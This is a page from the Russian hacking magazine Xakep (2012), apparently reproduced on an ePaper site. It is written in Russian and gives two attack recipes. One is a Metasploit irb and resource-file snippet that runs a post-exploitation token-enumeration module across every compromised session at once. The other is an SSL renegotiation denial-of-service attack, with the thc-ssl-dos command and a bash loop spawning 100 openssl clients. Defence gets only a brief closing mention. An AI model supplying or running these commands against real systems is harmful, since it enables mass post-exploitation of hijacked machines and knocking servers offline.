13.07.2015 Views

НА БАГАХ В CHROME - Xakep Online

НА БАГАХ В CHROME - Xakep Online

НА БАГАХ В CHROME - Xakep Online

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

ВЗЛОМ / EASY HACKКОМАНДОВАТЬ СРАЗУ ВСЕМИ ШЕЛЛАМИ ИЗ MSFЗАДАЧАРЕШЕНИЕХочу рассказать тебе об одном маленьком, но крайне юзабельномтрюке. Если мы проникли сразу на несколько машин, то, чтобы неписать команды в каждой из полученных сессий, мы можем воспользоватьсярадостями доступа к Ruby прямо из консоли MSF, запустивпостмодуль сразу во всех сессиях:msf> use post/windows/gather/enum_domain_tokensmsf enum_domain_tokens> irbframework.sessions.each_key do |session|run_single("set SESSION #{session}")print_status("Running #{active_module.fullname}against #{session}")run_single("run")sleep 1endКод получился тяжеловатым, но мы можем вписать его в rc-файл ипри необходимости запускать с помощью следующих команд:msf> use post/windows/gather/enum_domain_tokensmsf enum_domain_tokens> resource runall.rcВсё! Постмодуль запущен на всех поовненных машинах. За эту идеюреспектуем Jcran'у (goo.gl/sIhXf).ЗАDOSИТЬ СЕРВЕР С ПОМОЩЬЮ SSLЗАДАЧАРЕШЕНИЕПродолжаем мучить SSL. В позапрошлом выпуске рубрики мыразбирали уязвимость под названием SSL Renegation vuln вSSLv3/TLS-протоколе. Информация о ней была обнародована вдалеком 2009 году, поэтому в большинстве случаев она давноприкрыта. Как бы то ни было, официальные патчи уже есть, аrenegation (то есть переинициализация того же защищенногоTCP-соединения) уже не является опасной фичей, а потому умногих включена.Теперь давай рассмотрим другую интересную особенностьSSL-протоколов. При установке защищенного соединения серверзатрачивает гораздо больше процессорного времени (то есть большеиспользует процессор), чем клиент. Как ясно из задачи, этойособенностью можно воспользоваться в деструктивных целях. :-)К слову сказать, о ней известно довольно давно, но лишь недавногруппа THC представила тулзу, которая реализует описываемыйтип DoS-атаки для SSL (www.thc.org/thc-ssl-dos). Атака фактическиорганизуется путем множественных операций переинициализациизащищенных соединений (renegation) в контексте одногоSSL-соединения.Какова мощь такой атаки? Всё достаточно сурово. ПредставителиTHC пишут, что сервер затрачивает на установку соединенияв 15 раз больше ресурсов, чем клиент, а средний серверможет поддерживать порядка 300 инициализаций-соединений всекунду. Таким образом, имея всего лишь один атакующий хост снормальным каналом связи (DSL), мы сможем завалить приличныйсервер.Насколько это соответствует действительности? Здесь есть интересныенюансы. ИБ-специалист Vincent Bernat провел исследование,посвященное способам защиты от SSL DoS'а (goo.gl/Uqw8o).В ходе исследования он выяснил, что затраты процессорноговремени сильно зависят от используемого алгоритма шифрованияи, как видно из картинки, не настолько велики, хотя разницавсё же заметна. Следовательно, успешность атаки теоретическиопределяется алгоритмом шифрования.Что касается атаки на практике, то здесь всё просто. Берем известнуютулзу от THC и запускаем ее следующим образом:thc-ssl-dos.exe 127.1.1.1 443 --acceptЗапускаем SSL DoSЗдесь 127.1.1.1 — IP нашей жертвы, 443 — порт атакуемого сервиса(поддержка SSL обязательна), «--accept» — подтверждениетого, что мы не делаем ничего плохого. :-)Кстати, функция renegation вовсе не обязательна для атакуемогосервера. Атаковать можно и без нее, просто создав множествоSSL-соединений, однако нагрузка на канал и клиентскую машинупри этом увеличится в разы. Также атаку можно провернуть и безтулзы. Вот небольшой bash-скрипт от той же THC:thc-ssl-dosit() { while :; do (while :; do echo R; done) |\openssl s_client -connect 127.1.1.1:443 2>/dev/null; done }\for x in `seq 1 100`; do thc-ssl-dosit & doneХотелось бы также отметить, что атакуемым сервисом необязательнодолжен быть HTTPS. Подойдет любой другой порт, поддерживающийSSL (FTPs, POP3s), потому как сервер один и процессорноевремя тоже одно. Если же говорить о защите, то здесь потребуетсякак минимум отключить функции клиентского renegation'а, использоватьменее навороченные алгоритмы шифрования и ограничитьколичество инициализаций-соединений с одного IP. Подробноститы найдешь по ссылке goo.gl/Uqw8o.050ХАКЕР 02 /157/ 2012

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!